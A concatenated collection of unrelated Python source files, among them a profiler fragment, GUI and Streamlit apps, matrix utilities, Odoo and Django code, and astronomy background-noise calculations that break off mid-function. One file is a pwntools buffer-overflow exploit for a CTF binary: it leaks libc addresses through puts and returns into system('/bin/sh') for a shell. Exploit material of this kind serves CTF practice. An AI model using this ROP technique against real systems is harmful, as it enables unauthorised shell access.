'_parent.View:_hiding_tag_',
'_parent.View:hv',
'_parent:Use',
'_root:tracemalloc',
'_root:types',
)
#
def _get_Anything(self): return self.Use.Unity.classifier.get_kind(None)
def _get_Nothing(self): return IdentitySetMulti(
EmptyFamily(self), self.emptynodeset)
def _get_NotNothing(self): return Family.__call__(
self.fam_Invert, self.Nothing)
def _get_export_dict(self):
d = {}
for k, v in list(self.out_reach_dict.items()):
sc = getattr(v, '_uniset_exports', ())
for sc in sc:
x = getattr(v, sc)
if sc in d and d[sc] is not x:
raise RuntimeError(
'Duplicate export: %r defined in: %r' % (sc, k))
d[sc] = x
return d
def _get_out_reach_dict(self):
d = {}
for name in self.out_reach_module_names:
d[name] = getattr(self._parent, name)
return d
def _get_summary_str(self): return self.Summary_str(self)
def _get_fam_And(self): return self.AndFamily(self)
def _get_fam_EquivalenceRelation(
self): return EquivalenceRelationFamily(self)
def _get_fam_Or(self): return self.OrFamily(self)
def _get_fam_IdentitySet(self): return self.IdentitySetFamily(self)
def _get_fam_Invert(self): return self.InvertFamily(self)
def _get_fam_Family(self): return self.FamilyFamily(self)
def _get_fam_mixin_argatom(self):
memo = {}
def f(Mixin, *args, **kwds):
C = memo.get(Mixin)
if C is None:
class C(Mixin, self.ArgAtomFamily):
def __init__(self, mod, *args, **kwds):
mod.ArgAtomFamily.__init__(self, mod)
Mixin.__init__(self, mod, *args, **kwds)
C.__qualname__ = C.__name__ = Mixin.__name__
memo[Mixin] = C
return C(self, *args, **kwds)
return f
def idset_adapt(self, X):
if isinstance(X, self.IdentitySet):
ids = X
elif isinstance(X, self.NodeSet):
ids = self.idset(X)
else:
raise TypeError(
'IdentitySet or NodeSet expected, got %r.' % type(X))
if X._hiding_tag_ is not self._hiding_tag_:
raise ValueError(
"The argument has wrong _hiding_tag_, you may convert it by Use.idset or Use.iso.")
return ids
def idset(self, iterable, er=None):
return self.fam_IdentitySet._cons(self.immnodeset(iterable), er=er)
def _get_iso(self):
return self.fam_IdentitySet
def isuniset(self, obj):
return isinstance(obj, self.UniSet)
# Or has some particular attributes?
def nodeset_adapt(self, X):
if isinstance(X, self.NodeSet):
ns = X
elif isinstance(X, self.IdentitySet):
ns = X.nodes
else:
raise TypeError(
'IdentitySet or NodeSet expected, got %r.' % type(X))
if X._hiding_tag_ is not self._hiding_tag_:
raise ValueError(
"The argument has wrong _hiding_tag_, you may convert it by Use.idset or Use.iso.")
return ns
def retset(self, X):
if not isinstance(X, self.IdentitySet):
X = self.idset(X)
return X
def union(self, args, maximized=False):
if not args:
return self.Nothing
a = args[0]
for b in args[1:]:
a |= b
return a
# This optimization didn't work for idsets!!
# XXX to fix back
if not maximized:
args = maximals(args)
return self.fam_Or._cons(args)
def uniset_from_setcastable(self, X):
if isinstance(X, UniSet) and X._hiding_tag_ is self._hiding_tag_:
return X
types = self.types
if isinstance(X, type) and self.auto_convert_type:
return self.Use.Type(X)
elif isinstance(X, self.NodeSet) and X._hiding_tag_ is self._hiding_tag_:
return self.idset(X)
elif self.auto_convert_iter:
try:
it = iter(X)
except TypeError:
pass # Will raise a 'more informative' exception below
else:
return self.idset(it)
raise TypeError(
"Argument is not automatically convertible to a UniSet with correct _hiding_tag_.")
|
994,224 | f36c81329179aa9b48f91188f9cd5a87f6255635 | ## Motor Test GUI
from Tkinter import Tk, BOTH, RIGHT, RAISED, Listbox, END, LEFT
from ttk import Frame, Button, Style
class Motor(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.initUI()
def initUI(self):
self.parent.title("Motor Test")
self.style = Style()
# self.style.theme_use("clam")
global lb
lb = Listbox(self)
lb.pack(fill = BOTH, expand = 1)
frame = Frame(self, relief = RAISED, borderwidth = 1)
frame.pack(fill = BOTH, expand = 1)
self.pack(fill = BOTH, expand = 1)
closeButton = Button(self, text = 'Close', command = self.quit)
closeButton.pack(side = RIGHT, padx = 5, pady = 5)
test1Button = Button(self, text = 'Test 1', command = self.runTest1)
test1Button.pack(side = RIGHT)
test2Button = Button(self, text = 'Test 2', command = self.runTest2)
test2Button.pack(side = RIGHT)
clearButton = Button(self, text = 'Clear', command = self.clearTxt)
clearButton.pack(side = LEFT)
def runTest1(self):
lb.insert(END, 'Test 1 Complete')
def runTest2(self):
lb.insert(END, 'Test 2 Complete')
def clearTxt(self):
lb.delete(0, END)
def main():
root = Tk()
root.geometry("400x300")
app = Motor(root)
root.mainloop()
if __name__ == '__main__':
main()
|
994,225 | fb7d9a4f02beeaac817c4909f7873490b069f691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 04:21:23 2020
@author: levitannin
Working on threadding module in python.
Threading vs Multiprocessing
Multiprocessing -- library uses separate memory space, multiple CPU cores,
bypasses GIL limitations in CPython, child processes are killable (function
calls in program) and is easier to use. Caveats of the module are a larger
memory footprint and IPC's a little more complicated with more overhead
Threading -- multithreading is a lightweight, memory shring library respionsible
for UI and used well for I/O bound applications. It is not killable and
subject to GIL.
Multiple threads live in the same process in the same space, each thread
with a specific task and it's own code, stack memory, pointer, and share
heap memory. Memory leak can be damaging to other threads.
Concurrent.Futures -- library with new multiprocessing abilities. Automatically
joins iterative processes. ProcessPoolExecutor is for CPU intensive tasks.
ThreadPoolExecutor is better for network operations or I/O
In either case, executor.map() which allows multiple calls to a provided
function, passing each of the items in an iterable to that function. Here;
functions are called concurrently.
for multiprocessing the iterable is broken into chunks,
the size of which can be conntroleld using key chunk_size
http://masnun.com/2016/03/29/python-a-quick-introduction-to-the-concurrent-futures-module.html
"""
import requests
import time
import concurrent.futures
img_urls = [
'https://images.unsplash.com/photo-1516117172878-fd2c41f4a759',
'https://images.unsplash.com/photo-1532009324734-20a7a5813719',
'https://images.unsplash.com/photo-1524429656589-6633a470097c',
'https://images.unsplash.com/photo-1530224264768-7ff8c1789d79',
'https://images.unsplash.com/photo-1564135624576-c5c88640f235',
'https://images.unsplash.com/photo-1541698444083-023c97d3f4b6',
'https://images.unsplash.com/photo-1522364723953-452d3431c267',
'https://images.unsplash.com/photo-1513938709626-033611b8cc03',
'https://images.unsplash.com/photo-1507143550189-fed454f93097',
'https://images.unsplash.com/photo-1493976040374-85c8e12f0c0e',
'https://images.unsplash.com/photo-1504198453319-5ce911bafcde',
'https://images.unsplash.com/photo-1530122037265-a5f1f91d3b99',
'https://images.unsplash.com/photo-1516972810927-80185027ca84',
'https://images.unsplash.com/photo-1550439062-609e1531270e',
'https://images.unsplash.com/photo-1549692520-acc6669e2f0c'
]
t1 = time.perf_counter()
def download_image(img_url):
img_bytes = requests.get(img_url).content
img_name = img_url.split('/')[3]
img_name = f'{img_name}.jpg'
with open(img_name, 'wb') as img_file:
img_file.write(img_bytes)
print(f'{img_name} was downloaded...')
with concurrent.futures.ThreadPoolExecutor() as executor:
executor.map(download_image, img_urls)
t2 = time.perf_counter()
print(f'Finished in {t2-t1} seconds') |
994,226 | f3e0732e9fe98f7ea53c41765471e35f6a42bdeb | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
metrics
holds metrics to evaluate results
Author: Jacob Reinhold (jacob.reinhold@jhu.edu)
Created on: January 14, 2019
"""
__all__ = ['jaccard', 'dice', 'largest_cc']
import numpy as np
from skimage.measure import label
from torch import Tensor
def jaccard(x:Tensor, y:Tensor):
xm, ym = (x > 0), (y > 0)
intersection = (xm & ym).sum().float()
union = (xm | ym).sum().float()
if union == 0.: return 1.
return intersection / union
def dice(x:Tensor, y:Tensor):
xm, ym = (x > 0), (y > 0)
intersection = (xm & ym).sum().float()
cardinality = xm.float().sum() + ym.float().sum()
if cardinality == 0.: return 1.
return 2 * intersection / cardinality
def largest_cc(segmentation):
labels = label(segmentation)
assert(labels.max() != 0) # assume at least 1 CC
lcc = (labels == np.argmax(np.bincount(labels.flat)[1:])+1)
return lcc
|
994,227 | 5f2a8cf700b41d39f3367f2252e9e5f353c115ac | from pycaret.regression import load_model, predict_model
import streamlit as st
import pandas as pd
import numpy as np
model = load_model('deployment_model')
def predict(model, input_df):
predictions_df = predict_model(estimator=model, data=input_df)
predictions = predictions_df['Label'][0]
return predictions
def run():
from PIL import Image
image = Image.open('logo.jpg')
image_hospital = Image.open('logo2.jpg')
st.image(image,use_column_width=False)
add_selectbox = st.sidebar.selectbox(
"How would you like to predict?",
("Online", "Batch"))
st.sidebar.info('This app is created to predict Airline Passenger Satisfaction')
st.sidebar.image(image_hospital)
st.title("Airline Passenger Satisfaction Prediction App")
if add_selectbox == 'Online':
id = st.number_input('ID', min_value=1, max_value=10000, value=122)
Gender = st.selectbox('Gender', ['Male','Female'])
CustomerType = st.selectbox('Customer Type', ['Loyal Customer','disloyal Customer'])
Age = st.number_input('Age', min_value=1, max_value=100, value=25)
TypeofTravel = st.selectbox('Type of Travel', ['Business travel','Personal Travel'])
Class = st.selectbox('Class', ['Eco','Business','Eco Plus'])
FlightDistance = st.number_input('Flight Distance', min_value=1, max_value=100000, value=25)
Inflightwifiservice = st.selectbox('Inflight wifi service', [0,1,2,3,4,5])
DepartureArrivaltimeconvenient = st.selectbox('Departure/Arrival time convenient', [0,1,2,3,4,5])
EaseofOnlinebooking = st.selectbox('Ease of Online booking', [0,1,2,3,4,5])
Gatelocation = st.selectbox('Gate location', [0,1,2,3,4,5])
Foodanddrink = st.selectbox('Food and drink', [0,1,2,3,4,5])
Onlineboarding = st.selectbox('Online boarding', [0,1,2,3,4,5])
Seatcomfort = st.selectbox('Seat comfort', [0,1,2,3,4,5])
Inflightentertainment = st.selectbox('Inflight entertainment', [0,1,2,3,4,5])
Onboardservice = st.selectbox('On-board service', [0,1,2,3,4,5])
Legroomservice = st.selectbox('Leg room service', [0,1,2,3,4,5])
Baggagehandling = st.selectbox('Baggage handling', [0,1,2,3,4,5])
Checkinservice = st.selectbox('Checkin service', [0,1,2,3,4,5])
Inflightservice = st.selectbox('Inflight service', [0,1,2,3,4,5])
Cleanliness = st.selectbox('Cleanliness', [0,1,2,3,4,5])
DepartureDelayinMinutes = st.number_input('Departure Delay in Minutes', min_value=1, max_value=100000, value=25)
ArrivalDelayinMinutes = st.number_input('Arrival Delay in Minutes', min_value=1, max_value=100000, value=25)
output=""
input_dict = {'id':id,'Gender' : Gender, 'CustomerType' : CustomerType, 'Age' : Age, 'TypeofTravel' : TypeofTravel,'Class' : Class,'FlightDistance':FlightDistance,'Inflightwifiservice':Inflightwifiservice,'DepartureArrivaltimeconvenient':DepartureArrivaltimeconvenient ,'EaseofOnlinebooking':EaseofOnlinebooking ,'Gatelocation':Gatelocation ,'Foodanddrink':Foodanddrink,'Onlineboarding':Onlineboarding,'Seatcomfort':Seatcomfort,'Inflightentertainment':Inflightentertainment,'Onboardservice':Onboardservice,'Legroomservice':Legroomservice,'Baggagehandling':Baggagehandling,'Checkinservice':Checkinservice,'Inflightservice':Inflightservice,'Cleanliness':Cleanliness,'DepartureDelayinMinutes':DepartureDelayinMinutes,'ArrivalDelayinMinutes':ArrivalDelayinMinutes}
input_df = pd.DataFrame([input_dict])
if st.button("Predict"):
output = predict(model=model, input_df=input_df)
output = str(output)
st.success('The output is {}'.format(output))
if add_selectbox == 'Batch':
file_upload = st.file_uploader("Upload csv file for predictions", type=["csv"])
if file_upload is not None:
data = pd.read_csv(file_upload)
predictions = predict_model(estimator=model,data=data)
st.write(predictions)
if __name__ == '__main__':
run() |
994,228 | d8ab21dfe4aacc5a12ce3c4d3ce557037a8436a4 | import pandas as pd
from coding_the_matrix import Vec
from coding_the_matrix import matutil
from numbers import Number
import numpy as np
def vec_mul_mat(u, M):
"""vec * matrix multiplication"""
assert u.D == M.D[0]
# get a row representation of matrix
return Vec.Vec(M.D[1], {k: u * vec for k, vec in matutil.mat2coldict(M).items()})
def mat_mul_vec(M, u):
"""matrix * vec multiplication"""
assert M.D[1] == u.D
return Vec.Vec(M.D[0], {k: vec * u for k, vec in matutil.mat2rowdict(M).items()})
def mat_mul_mat(U, V):
"""matrix * matrix multiplication"""
assert U.D[1] == V.D[0]
rowdict = matutil.mat2rowdict(U)
for key, row in rowdict.items():
rowdict[key] = row * V
return matutil.rowdict2mat(rowdict, col_labels=V.original_labels[1])
def mat_mul_num(M, num):
"""matrix number multiplication (use the underlying vec)"""
rowdict = matutil.mat2rowdict(M)
for key, row_vec in rowdict.items():
rowdict[key] = row_vec * num
return matutil.rowdict2mat(rowdict, col_labels=M.original_labels[1])
class Mat:
def __init__(self, labels, function):
self._original_labels = [item.copy() for item in labels]
labels = [set(label) for label in labels]
assert len(labels) == 2
assert all([isinstance(d, set) for d in labels])
assert all([isinstance(k, tuple) and len(k) == 2 for k in function.keys()])
assert all([i in labels[0] and j in labels[1] for (i, j) in function.keys()])
self.D = labels
self.f = function
@property
def original_labels(self):
return self._original_labels
@property
def shape(self):
return len(self.D[0]), len(self.D[1])
@property
def max(self):
return max(self.f.values())
@property
def min(self):
return min(self.f.values())
def copy(self):
return self.__class__(self.D, self.f.copy())
def __repr__(self):
return "Mat({}, {})".format(self.D, self.f)
def __neg__(self):
return self.__class__(self._original_labels, {k: -v for k, v in self.f.items()})
def __eq__(self, other) -> bool:
"""
Parameters
----------
other : Mat
"""
same_class = isinstance(other, Mat)
same_D = self.D[0] == other.D[0] and self.D[1] == other.D[1]
same_f = self._sparse_f() == other._sparse_f()
return same_D and same_f and same_class
def _sparse_f(self):
return {k: v for k, v in self.f.items() if v != 0}
def __getitem__(self, value):
assert isinstance(value, tuple)
assert len(value) == 2
return self.f.get(value, 0)
def __setitem__(self, key, value):
assert isinstance(key, tuple)
assert len(key) == 2
assert key[0] in self.D[0]
assert key[1] in self.D[1]
self.f[key] = value
def __mul__(self, other):
"""M * u"""
if isinstance(other, Vec.Vec):
return mat_mul_vec(self, other)
if isinstance(other, self.__class__):
return mat_mul_mat(self, other)
if isinstance(other, Number):
return mat_mul_num(self, other)
raise NotImplementedError(f"{type(self)} and {type(other)}")
def __rmul__(self, other):
"""u * M"""
if isinstance(other, Vec.Vec):
return vec_mul_mat(other, self)
if isinstance(other, Number):
return mat_mul_num(self, other)
raise NotImplementedError(f"{type(self)} and {type(other)}")
def __add__(self, other):
# add each item if other is matrix
if isinstance(other, Mat):
assert other.D == self.D
return Mat(
self.D,
{
k: (self[k] + other[k])
for k in set(self.f.keys()) | set(other.f.keys())
},
)
return NotImplemented
def __sub__(self, other):
if isinstance(other, Mat):
assert other.D == self.D
return Mat(
self.D,
{
k: (self[k] - other[k])
for k in set(self.f.keys()) | set(other.f.keys())
},
)
return NotImplemented
def __str__(self):
R, C = self._original_labels
row_dict = {r: [self.f.get((r, c), 0) for c in C] for r in R}
df = pd.DataFrame.from_dict(row_dict, orient="index")
df.columns = C
return df.to_string()
def to_pandas(self):
R, C = self.D
row_dict = {r: [self.f.get((r, c), 0) for c in C] for r in R}
df = pd.DataFrame.from_dict(row_dict, orient="index")
df.columns = C
return df
def transpose(self):
R, C = self.D
D = (C, R)
f = {(c, r): v for (r, c), v in self.f.items()}
return Mat(D, f)
def pprint(self, rows=None, cols=None):
"""Reorder the matrix (useful for triangular matrices)"""
df = self.to_pandas()
R, C = self.D
if rows is not None:
assert set(rows) == R
df = df.loc[rows, :]
if cols is not None:
assert set(cols) == C
df = df.loc[:, cols]
return df
def __abs__(self):
return np.sqrt(sum([value ** 2 for value in self.f.values()]))
|
994,229 | 145064f1444de21c6f652cbf26df25b3c7af9a14 | #! /usr/bin/env python3
import sys
def isLoadStore(instruction: str):
return (instruction.find("mov") != -1 or instruction.find("add") != -1 or instruction.find("sub") != -1 or instruction.find("mul") != -1 or instruction.find("sal") != -1 or instruction.find("sar") != -1 or instruction.find("xor") != -1 or instruction.find("and") != -1 or instruction.find("or") != -1 or instruction.find("inc") != -1 or instruction.find("dec") != -1 or instruction.find("neg") != -1 or instruction.find("not") != -1 or instruction.find("shl") != -1 or instruction.find("shr") != -1 or instruction.find("rol") != -1 or instruction.find("ror") != -1 or instruction.find("rcl") != -1 or instruction.find("rcr") != -1 or instruction.find("sto") != -1 or instruction.find("lod") != -1)
def filter(input_file, output_file):
index = 1
load_store_map = {}
load_store_file = output_file.name + ".lsmap"
lsfile = open(load_store_file, "w")
output_tuple=("Address", "L/S", "Inst#")
lsfile.write('{0:<10} {1:>16} {2:>10}\n'.format(*output_tuple))
is_crashing_inst = False
while(True):
line = input_file.readline()
IsMemAcess = False
memacctype = -1
effective_address = -1
if(not line):
break
if(line.find("=>") != -1):
line = line.strip()
main_list = line.split()
register_dict = {}
for i in range(0,24):
if is_crashing_inst:
break
line = input_file.readline()
temp_list = line.split()
if i == 0 and temp_list[0] != "rax":
is_crashing_inst = True
register_dict[temp_list[0]] = temp_list[1]
#print(main_list)
if is_crashing_inst:
output_file.write("***CRASHED***\nLast Instruction is :" + main_list[0])
break
main_list.pop(0)
if(len(main_list)<=0):
continue
instruction = main_list[0]
main_list.pop(0)
output_file.write("Instruction " + str(index)+": " + instruction+ "\n")
if(len(main_list)> 0):
main_list = main_list[0].split(",",1)
if(len(main_list) > 1):
if(main_list[0].find("(") != -1 and main_list[1].find(")") != -1):
partition = main_list[1][0:main_list[1].find(")")+1]
concat = main_list[0] + "," + partition
main_list[1] = main_list[1].replace(partition+",","")
main_list.pop(0)
main_list.insert(0, concat)
op_index = 0
output_file.write("Operands: ")
for operand in main_list:
output_file.write(operand)
if(op_index == 0 and len(main_list) > 1):
output_file.write(", ")
if(op_index == 0):
if(operand[0] == '-' or operand[0] == '0' or operand[0] == "*"):
operand = operand.replace("%","")
operand = operand.replace("(", ",")
IsMemAcess = True
memacctype = 0
operand = operand.replace(")", "")
operand = operand.replace("*","")
operand = operand.split(",")
for x in operand:
if(x == ''):
operand.remove(x)
if(len(operand) > 1):
if(operand[1] == ''):
operand.pop(1)
base_addr = int(register_dict[operand[1]],16)
offset = int(operand[0],16)
if(len(operand) == 3):
op_size = int(operand[2],16)
base_addr = base_addr * offset
effective_address = base_addr + offset
output_file.write(" ---> Effective Address = "+hex(effective_address))
else:
if(operand[0] in register_dict.keys()):
effective_address = register_dict[operand[0]]
else:
effective_address = operand[0]
output_file.write(" ---> Effective Address = "+effective_address)
elif(operand[0] == "("):
IsMemAcess = True
memacctype = 0
operand = operand.replace("(","")
operand = operand.replace(")","")
operand = operand.replace("%","")
operand = operand.split(",")
if(len(operand) > 1):
base_addr = int(register_dict[operand[0]], 16)
offset = int(register_dict[operand[1]], 16)
op_size = int(operand[2], 16)
effective_address = base_addr + (offset * op_size)
output_file.write(" ---> Effective Address = "+hex(effective_address))
else:
if(operand[0].find("0x") != -1):
effective_address = operand[0]
output_file.write(" ---> Effective Address = "+hex(effective_address))
else:
effective_address = register_dict[operand[0]]
output_file.write(" ---> Effective Address = "+register_dict[operand[0]])
elif(op_index == 1):
if(operand[0] == '-' or operand[0] == '0' or operand[0] == "*"):
IsMemAcess = True
memacctype = 1
operand = operand.replace("%","")
operand = operand.replace("(", ",")
operand = operand.replace(")", "")
operand = operand.replace("*","")
operand = operand.split(",")
if(len(operand) > 1):
if(len(operand) == 2):
base_addr = int(register_dict[operand[1]],16)
offset = int(operand[0],16)
effective_address = base_addr + offset
output_file.write(" ---> Effective Address = "+hex(base_addr+offset))
elif(len(operand) == 4):
base_addr = int(register_dict[operand[1]],16)
offset = int(operand[0],16)
mem_index = int(register_dict[operand[2]],16)
mem_sz = int(operand[3],16)
effective_address = base_addr+offset+(mem_index*mem_sz)
output_file.write(" ---> Effective Address = "+hex(effective_address))
else:
effective_address = operand[0]
output_file.write(" ---> Effective Address = "+operand[0])
op_index+=1
output_file.write("\n")
else:
output_file.write("NO ARGS\n")
if(IsMemAcess == True):
if(memacctype == 0 and isLoadStore(instruction)):
output_file.write("<------ LOAD OPERATION ------>\n")
if isinstance(effective_address, str):
output_tuple = (effective_address, "LOAD", str(index))
else:
output_tuple = (hex(effective_address), "LOAD", str(index))
#lsfile.write(hex(effective_address) + " "+"LOAD"+" "+str(index)+"\n")
lsfile.write('{0:<10} {1:>13} {2:>10}\n'.format(*output_tuple))
elif(memacctype == 1 and isLoadStore(instruction)):
output_file.write("<------ STORE OPERATION ------>\n")
if isinstance(effective_address, str):
output_tuple = (effective_address, "STORE", str(index))
else:
output_tuple = (hex(effective_address), "STORE", str(index))
#lsfile.write(hex(effective_address) + " "+"LOAD"+" "+str(index)+"\n")
lsfile.write('{0:<10} {1:>13} {2:>10}\n'.format(*output_tuple))
output_file.write("---------------------------------------\n")
index +=1
return 0
def main(argv: list):
if(len(argv) < 3):
print("Missing input and/or output file names")
return -1
infile = open(argv[1], "r")
outfile = open(argv[2], "w")
filter(infile, outfile)
return 0
if __name__ == "__main__":
main(sys.argv) |
994,230 | 28041a46a3cc302f94edf3cddb14a5b762ab5c4e | # Generated by Django 3.1.3 on 2020-12-15 15:40
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('api', '0007_profile'),
]
operations = [
migrations.AddField(
model_name='ad',
name='Time',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now),
),
migrations.AddField(
model_name='profile',
name='contact_no',
field=models.IntegerField(null=True),
),
]
|
994,231 | 67b1d926d0d0dc1260e811b429480ccee0f81ce8 | # -*- coding: utf-8 -*-
from odoo import models, fields, api
class ProductProduct(models.Model):
_inherit = 'product.product'
x_service_remind_ids = fields.One2many('product.service.remind', 'product_id', string="Remind Service")
x_is_remind = fields.Boolean(string="Is remind", default=False)
def get_config_remind(self, remind_configs):
arr_remind_config = []
for remind_config in remind_configs:
arr_remind_config.append({
'activity_type_id': remind_config.activity_type_id.id,
'date_number': remind_config.date_number,
'object': remind_config.object,
'repeat': remind_config.repeat,
'period': remind_config.period,
'type': remind_config.type,
'note': remind_config.note
})
return arr_remind_config
|
994,232 | 3b00e7993fe3df0b4059a3cdf2fd591e6cef83d8 | alist = [100, 200, 300, 400, 500]
blist = []
for i in alist[::]:
blist.append(i)
print(blist)
|
994,233 | e25eb3ecfab44b06322111b47c330dfca2a98770 | from pwn import *
import sys
if len(sys.argv) == 1 :
p = process('./pwn200')
else :
print 'Remote server is disabled'
exit()
# Gadget
pop_1_ret = 0x8048331
# Address
puts_plt = 0x8048360
read_got = 0x804A00C
puts_got = 0x804A010
payload = 'A'*(0x18+4)
payload += p32(puts_plt)
payload += p32(pop_1_ret)
payload += p32(read_got)
payload += p32(puts_plt)
payload += p32(0x8048511) # func: lOL
payload += p32(puts_got)
p.recvuntil(':D?\n')
p.write(payload)
read_addr = u32(p.recvline()[:4])
puts_addr = u32(p.recvline()[:4])
print '[Exploit] read = '+hex(read_addr)
print '[Exploit] puts = '+hex(puts_addr)
# libc : libc6_2.29-0ubuntu2_i386
libc_base = read_addr-0xED7E0
system_addr = libc_base+0x42C00
str_bin_sh_addr = libc_base+0x184B35
payload = 'A'*(0x18+4)
payload += p32(system_addr)
payload += 'A'*4
payload += p32(str_bin_sh_addr)
p.write(payload)
p.interactive()
|
994,234 | b6123793cd00d49d0866556a5e69ea7513891e8e | from tests.base_case import ChatBotTestCase
from chatterbot.trainers import Trainer
from chatterbot.conversation import Statement
class TrainingTests(ChatBotTestCase):
def setUp(self):
super().setUp()
self.trainer = Trainer(self.chatbot)
def test_trainer_not_set(self):
with self.assertRaises(Trainer.TrainerInitializationException):
self.trainer.train()
def test_generate_export_data(self):
self.chatbot.storage.create_many([
Statement(text='Hello, how are you?'),
Statement(text='I am good.', in_response_to='Hello, how are you?')
])
data = self.trainer._generate_export_data()
self.assertEqual(
[['Hello, how are you?', 'I am good.']], data
)
|
994,235 | 37d1e5b7ace4ca7f1c90ed632acdc05dd6593d8e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is here to make it easy load various text corpuses into other
scripts.
"""
from os import path
from nltk.corpus.reader import PlaintextCorpusReader
pwd = path.curdir
def load_pres_debates():
"""
Returns the corpus for the presidential debates.
"""
debates = PlaintextCorpusReader(path.join(pwd, "pres_debates"), ".*.txt")
return debates
|
994,236 | 75b0c8bd407c17b6fc5d6bd04e2dd069fed7ad07 | class Solution(object):
def constructArray(self, n, k):
i, j = 1, n
res = []
while i <= j:
res.append(i)
if i != j:
res.append(j)
i+=1
j-=1
res = res[:k-1] + sorted(res[k-1:])
if k>1 and res[k-2]<=n/2:
res = res[:k-1] + res[k-1:][::-1]
return res
|
994,237 | 0afc1fc1f3c8f70ec8f28dfbfbd6b900373074b9 | import gc, const, plotter, file_refs
import numpy as np
from scipy import interpolate
from excel import ExcelReader
# These calculations reference equations in 2 papers:
# "Limitations on Observing Submillimeter and Far Infrared Galaxies" by Denny
# and
# "Fundamental Limits of Detection in the Far Infrared" by Denny et al
# The 1st 4 functions defined calculate BLING(squared) for the backgrounds
# The 3 functions after calculate antenna temperature for the backgrounds(a preliminary step for the BLING functions)
# There is no temperature function for "bling_sub" since those backgrounds have given temperatures in data files
# The functions after that calculate: limiting flux, integration time, and total signal
def bling_sub(freq, temp, resol): #calculates BLING(squared) for "Cosmic Infrared Background", "Galactic Emission", and/or "Zodiacal Emission"
## What will be done: 1) Interpolate temperature vs. frequency
## 2) Calculate integration constants and integration range
## 3) Calculate BLING(squared) from antenna temperature
## 1) Interpolate temperature vs. frequency
f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
## 2) Calculate integration constants and integration range
resol = float(resol) #ensure "resol" is a float not an integer
step_size = 1.5e5 #characterize the level of details wanted from interpolation
#decreasing "step_size" can lose smoothness of plot and increasing "step_size" lengthens calculation time
c = 2 * const.h * const.k * step_size #2 is number of modes, constants come from equation 2.15 in Denny(without the radical), "step_size" is the increment of the Riemann sum
int_range = np.zeros((len(freq), 2)) #create 2 by (length of frequency range) array full of 0's to be replaced with values
int_range_length = freq/2/resol #2nd term in integration bounds from equation 2.15 in Denny
int_range[:,0]=freq - int_range_length #fill up 1st column of 0's array with bottom integration bound from equation 2.15 in Denny
int_range[:,1]=freq + int_range_length #fill up 2nd column of 0's array with top integration bound from equation 2.15 in Denny
ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #"i in int_range" refers to each row(which has a start and end to the integration range)
#for each row, an array is created with values ranging from the starting value to the ending value, in increments of "step_size"
## 3) Calculate BLING(squared from antenna temperature
blingSUB_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #"i in ranges" refers to each row(of the bounds plus "step_size") from the array created above
#for each row, each of the 2 bounds is multiplied by its corresponding temperature from the linear interpolation done at the start and then are summed
#summing does the integral for each frequency
#the sum is multiplied by the number of modes, physical constants, and "step_size" which gives the BLING
#the result should be square rooted but, since the BLINGs are to be added in quadrature, the squares of each background's BLING are added up then square rooted
return blingSUB_squared
def bling_CMB(freq, resol): #calculates BLING(squared) for "Cosmic Microwave Background"
## What will be done: 1) Calculate intensity from frequency
## 2) Calculate antenna temperature from intensity
## 3) Calculate BLING(squared) from antenna temperature
## 1) Calculate intensity from frequency
resol = float(resol) #ensure "resol" is a float not an integer
temp = [] #create list to be filled with calculated temperatures
c1 = const.h / (const.k * const.T) #constants from equation 2.16 in Denny
c2 = 2 * const.h / (const.c ** 2) #constants from equation 2.16 in Denny
for i in freq:
denom = np.exp(c1 * i) - 1 #calculate part of the denominator in equation 2.16 in Denny
intensity = c2 * (i ** 3)/denom #calculate intensity from equation 2.16 in Denny
## 2) Calculate antenna temperature from intensity
antenna_temp = .5 * intensity * (const.c ** 2)/(const.k * (i**2)) #calculate antenna temperature from equation 2.7 in Denny
#.5 comes from modes=2
temp.append(antenna_temp) #add calculated temperature to "temp" list
temp = np.array(temp) #turn "temp" list into "temp" array
## 3) Calculate BLING(squared) from antenna temperature
f = interpolate.InterpolatedUnivariateSpline(freq, temp, k=1) #linear interpolation of "temp" vs. "freq"
step_size = 1.5e5 #characterize the level of details wanted from interpolation
#decreasing "step_size" can lose smoothness of plot and increasing "step_size" lengthens calculation time
c = 2 * const.h * const.k * step_size #2 is number of polarization modes, constants come from equation 2.15 in Denny(without the radical) and "step_size" is the increment of the Riemann sum
int_range = np.zeros((len(freq), 2)) #create 2 by (length of frequency range) array full of 0's to be replaced with values
int_range_length = freq/2/resol #2nd term in integration bounds from equation 2.15 in Denny
int_range[:,0]=freq - int_range_length #fill up 1st column of 0's array with bottom integration bound from equation 2.15 in Denny
int_range[:,1]=freq + int_range_length #fill up 2nd column of 0's array with top integration bound from equation 2.15 in Denny
ranges = (np.arange(*(list(i)+[step_size])) for i in int_range) #"i in int_range" refers to each row(which has a start and end to the integration range)
#for each row, an array is created with values ranging from the starting value to the ending value, in increments of "step_size"
blingCMB_squared = np.array([c*np.sum(i*f(i)) for i in ranges]) #"i in ranges" refers to each row(of the bounds plus "step_size") from the array created above
#for each row, each of the 2 bounds is multiplied by its corresponding temperature from the linear interpolation done at the start and then are summed
#summing does the integral for each frequency
#the sum is multiplied by the number of modes, physical constants, and "step_size" which gives the BLING
#the result should be square rooted but, since the BLINGs are to be added in quadrature, the squares of each background's BLING are added up then square rooted
return blingCMB_squared
def bling_AR(freq, rad, resol): #calculates BLING(squared) for "Atmospheric Radiance"
## What will be done: 1) Interpolate radiance vs. frequency
## 2) Calculate antenna temperature from radiance
## 3) Calculate BLING(squared) from antenna temperature
## 1) Interpolate radiance vs. frequency
rad = rad / (3e6) #radiance files are given in W/cm^2/st/cm^-1 but are converted to W/m^2/st/Hz
rad = interpolate.InterpolatedUnivariateSpline(freq, rad, k=1) #linear interpolation of "rad" vs. "freq"
## 2) Calculate antenna temperature from radiance
temp = [] #create list to be filled with calculated temperatures
for i in freq:
antenna_temp = .5 * rad(i) * (const.c ** 2)/(const.k * (i**2)) #calculate antenna temperature from equation 2.7 in Denny
temp.append(antenna_temp) #add calculated temperature to "temp" list
temp = np.array(temp) #turn "temp" list into "temp" array
## 3) Calculate BLING(squared) from antenna temperature
